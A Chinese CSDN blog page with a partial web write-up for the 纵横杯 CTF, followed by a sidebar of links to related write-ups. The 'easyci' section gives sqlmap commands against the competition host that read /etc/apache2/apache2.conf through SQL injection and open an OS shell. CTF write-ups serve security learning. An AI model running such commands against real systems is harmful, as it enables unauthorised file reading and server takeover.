纵横杯CTF部分WEB题解

最新推荐文章于 2023-03-05 13:45:54 发布
最新推荐文章于 2023-03-05 13:45:54 发布
阅读量958 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web类 文章标签: java linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenzidu/article/details/111792190

easyci

一道SQL注入题,大概思路:sql注入写入shell,读取flag文件。
sqlmap先读取"/etc/apache2/apache2.conf"内容。

sqlmap -u http://eci-2ze0xe7juyhmgubdhea1.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --threads=10 --file-read="/etc/apache2/apache2.conf"

在这里插入图片描述

发现绝对路径(/var/sercet/html)再写入shell

sqlmap -u http://eci-2ze3qpk9e6qoggl1cuol.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --os-shell

ezcms

参考文章:
YZMCMS V5.3后台 SSRF
Bug #76857 Can read “non-existant” files

最低0.47元/天 解锁文章
CTF WEB基础】POST-Bugku CTF题解及知识点
yu_fly_fish的博客
08-03 782
一起变强!
CTF部分题解
qq_72661106的博客
04-19 614
23代表#,后面是上传的文件名。进入网站,发现没有异常,尝试用蚁剑连接。进入网站先打开开发者工具没有发现任何js,尝试用御剑后台扫描目录。打开网站,发现有上传文件功能,尝试使用一句话木马上传php文件。可以看到文件上传路径,之后打开蚁剑进行连接,从而找到flag。打开网站,打开开发者工具在网络选项可以找到登陆密码,发现可以上传文件,尝试用一句话木马上传php文件,点击左侧数据库找到flags,得到flag。得到上传路径,采用zip伪压缩构造url。能够得到admin网址,再点击第一个网址。
纵横2020 web wp
会下雪的晴天
01-02 972
title: 纵横2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比 link:https://yq1ng.github.io/ 图片是新博客截图过来的,可能糊了,可以去新博客地址看 WankkoRee师傅、Mr.水函师傅带飞我,这次比学到不少东西,先放个排名,膜拜师傅们 第一次ak web,后援团的大师傅们的思路都很骚,多多学习,今天被引号闭合搞了两次,以后注意,phar的闭合与cms的闭合 easyci hel.
纵横网络安全竞Writeup
Tajang的大千世界
02-16 905
好比
EasyPHP-5.3.8.0-setup
09-27
apache,php,mysql等资源安装与BugFree配套使用
2020纵横网络安全竞web-wp
Firebasky的博客
12-27 1866
今天没有又没有复习数据结构,和师傅们打了这个比,最后终于ak了web。感谢师傅们的帮助~ 这次团名次也不错,再接再厉~ 链接:https://pan.baidu.com/s/1lSg-GT-v9jh4t9hmZJOVxw 提取码:nle4 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
网络安全平台测试 easyphp(phar脏数据处理)
weixin_63231007的博客
03-05 1922
利用tar文件格式绕过phar脏数据
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞,其中参者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全】Web安全是网络...
[2021N1CTF国际]Easyphp-Wp
Y4tacker的博客
11-22 3186
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
2020-纵横-Writeup.pdf
03-15
2020年纵横CTFWriteup 高清PDF版
EasyPHP-5.3.5.0-setup.exe
11-25
c++bulider班级程序下载,有助于我们对班级系统的初步认识。
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型注入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为假,返回结果为空。  通过 order by 判断表的列数为 3  构造注入语句,判断回显情况为 2、3 列
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
2020 年 V&N 内部考核 WriteUp
12-22
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # return flag ## want flag? naive! # You will never find the thing you want:) I think @app.route('/she
2020 纵横 线上 MISC部分Writeup
末初 · mochu7
12-30 1075
文章目录签到马克My_Secret问卷调查 签到 oct_str = '[0146, 0154, 0141, 0147, 0173, 0167, 063, 0154, 0143, 0157, 0155, 0145, 0137, 0164, 0157, 0137, 062, 0157, 0156, 0147, 0137, 0150, 063, 0156, 0147, 0137, 0142, 0145, 061, 0175]' oct_list = oct_str.replace("[","").rep
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
qq_45699846的博客
03-22 2675
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
CTF密码学之SM4
热门推荐
CharlesGodX的博客
10-13 1万+
介绍 SM4.0(原名SMS4.0)是中华人民共和国政府采用的一种分组密码标准,由国家密码管理局于2012年3月21日发布。相关标准为“GM/T 0002-2012《SM4分组密码算法》(原SMS4分组密码算法)”。在商用密码体系中,SM4主要用于数据加密,其算法公开,分组长度与密钥长度均为128bit,加密算法与密钥扩展算法都采用32轮非线性迭代结构,S盒为固定的8比特输入8比特输出。SM4.0...
青少年ctf练习平台web题解
最新发布
01-19
### 青少年CTF练习平台Web挑战题解和教程 #### Web EasyMD5 解析 在青少年CTF擂台挑战2024 round#1中,有一道名为EasyMD5的题目。这道题目的设计非常适合初学者尝试解决,尽管它要求参与者具备一定的web安全基础知识以及创新思维能力[^1]。 对于此题的具体解法如下: ```python import hashlib def solve_easy_md5(given_hash): # 假设给定的是md5哈希值 for i in range(10000): # 尝试暴力破解四位数以内的情况 test_str = str(i).zfill(4) if hashlib.md5(test_str.encode()).hexdigest() == given_hash: return test_str raise ValueError("No solution found") # 使用方法 (假设已知hash为'827ccb0eea8a706c4c34a16891f84e7b') print(solve_easy_md5('827ccb0eea8a706c4c34a16891f84e7b')) ``` 这段Python脚本展示了如何通过枚举可能的输入来找到与给出散列匹配的结果字符串。当然,在实际比中还需要考虑更多细节和技术手段去优化效率或处理更复杂的情形。 #### 处理靶机Flash Error的问题 当遇到某些特定条件下会出现页面刷新并显示错误提示的现象时,可以采用Burp Suite这样的工具来进行中间人攻击测试。具体来说就是利用BP抓取请求数据包之后修改其中的内容再发送回去完成答题过程。这种方法虽然相对较为复杂些,但对于熟悉网络协议分析的人来说并不困难,并且能够有效规避因服务器端配置不当所引起的异常情况[^2]。 #### Emoji表情包编码解析 在一个关于Crypto分类下的easy级别题目里提到过一种有趣的加密方式——使用emoji作为字符集进行BaseN变换后再经过其他形式的编码转换最终形成flag。这里的关键在于识别出正确的编/解码路径从而还原原始信息。例如先将看到的一系列图标按照某种规则映射成ASCII码或其他常见字符集合成员;接着可能是多次迭代不同的编码算法直到获得可读文本为止[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值